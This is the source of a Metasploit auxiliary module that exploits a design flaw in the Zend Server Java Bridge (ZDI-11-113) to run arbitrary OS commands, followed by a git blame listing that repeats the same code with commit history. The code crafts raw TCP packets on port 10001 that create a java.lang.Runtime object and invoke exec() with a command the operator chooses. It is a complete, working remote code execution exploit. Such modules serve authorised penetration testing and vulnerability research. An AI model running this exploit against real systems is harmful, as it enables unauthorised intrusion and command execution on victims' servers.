modules/auxiliary/admin/zend/java_bridge.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zend Server Java Bridge Design Flaw Remote Code Execution',
      'Description'    => %q{
          This module abuses a flaw in the Zend Java Bridge Component of
        the Zend Server Framework. By sending a specially crafted packet, an
        attacker may be able to execute arbitrary code.

        NOTE: This module has only been tested with the Win32 build of the software.
      },
      'Author'         => [ 'ikki', 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '71420'],
          [ 'ZDI', '11-113' ],
          [ 'EDB', '17078' ],
        ],
      'DisclosureDate' => '2011-03-28'))

    register_options(
      [
        Opt::RPORT(10001),
        OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
      ])
  end

  def run

    cmd = datastore['CMD']

    connect

    java_object =  [0x33000000].pack('V') + [0x00000000].pack('V')
    java_object << [0x0c000000].pack('V') + "CreateObject"
    java_object << [0x02000000].pack('V') + [0x00000004].pack('V')
    java_object << "\x11" + "java.lang.Runtime" + "\x07"
    java_object << [0x00000000].pack('V')

    print_status("Creating the Java Object 'java.lang.Runtime'")
    sock.put(java_object)
    res = sock.get_once() || ''
    classid = res[5,4]

    runtime =  [0x16000000].pack('V') + classid + [0x0a000000].pack('V')
    runtime << "getRuntime" + [0x00000000].pack('V')

    print_status("Invoking static method 'getRuntime()'")
    sock.put(runtime)
    res = sock.get_once() || ''
    methodid = res[5,4]

    exec =  [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid
    exec << [0x04000000].pack('V') + "exec" + [0x01000000].pack('V')
    exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd

    print_status("Invoking method 'exec()' with parameter '#{cmd}'")
    sock.put(exec)
    success = sock.get_once() || ''
    if (success =~ /\x00\x00\x00/)
      print_status("Cleaning up the JVM")
      rm =  [0x11000000].pack('V') + [0xffffffff].pack('V')
      rm << [0x05000000].pack('V') + "reset"
      rm << [0x00000000].pack('V')
      sock.put(rm)
    else
      print_error("Failed to run command...")
      disconnect
      return
    end

    disconnect

  end
end
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`include Msf::Exploit::Remote::Tcp`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',`
			`'Description' => %q{`
			`This module abuses a flaw in the Zend Java Bridge Component of`
			`the Zend Server Framework. By sending a specially crafted packet, an`
			`attacker may be able to execute arbitrary code.`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`NOTE: This module has only been tested with the Win32 build of the software.`
			`},`
			`'Author' => [ 'ikki', 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '71420'],`
Update modules to use new ZDI reference 2013-10-21 15:07:07 -05:00			`[ 'ZDI', '11-113' ],`
References EDB cleanup 2012-10-23 21:02:09 +02:00			`[ 'EDB', '17078' ],`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2011-03-28'))`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`register_options(`
			`[`
			`Opt::RPORT(10001),`
			`OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`def run`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`cmd = datastore['CMD']`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`java_object = [0x33000000].pack('V') + [0x00000000].pack('V')`
			`java_object << [0x0c000000].pack('V') + "CreateObject"`
			`java_object << [0x02000000].pack('V') + [0x00000004].pack('V')`
			`java_object << "\x11" + "java.lang.Runtime" + "\x07"`
			`java_object << [0x00000000].pack('V')`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`print_status("Creating the Java Object 'java.lang.Runtime'")`
			`sock.put(java_object)`
Handle nil for get_once 2012-06-04 15:31:10 -05:00			`res = sock.get_once() \|\| ''`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`classid = res[5,4]`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`runtime = [0x16000000].pack('V') + classid + [0x0a000000].pack('V')`
			`runtime << "getRuntime" + [0x00000000].pack('V')`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`print_status("Invoking static method 'getRuntime()'")`
			`sock.put(runtime)`
Handle nil for get_once 2012-06-04 15:31:10 -05:00			`res = sock.get_once() \|\| ''`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`methodid = res[5,4]`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid`
			`exec << [0x04000000].pack('V') + "exec" + [0x01000000].pack('V')`
			`exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`print_status("Invoking method 'exec()' with parameter '#{cmd}'")`
			`sock.put(exec)`
Handle nil for get_once 2012-06-04 15:31:10 -05:00			`success = sock.get_once() \|\| ''`
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`if (success =~ /\x00\x00\x00/)`
			`print_status("Cleaning up the JVM")`
			`rm = [0x11000000].pack('V') + [0xffffffff].pack('V')`
			`rm << [0x05000000].pack('V') + "reset"`
			`rm << [0x00000000].pack('V')`
			`sock.put(rm)`
			`else`
			`print_error("Failed to run command...")`
			`disconnect`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`disconnect`
Retab modules 2013-08-30 16:28:54 -05:00
added auxiliary module zend/java_bridge.rb 2011-04-01 22:01:46 +00:00			`end`
			`end`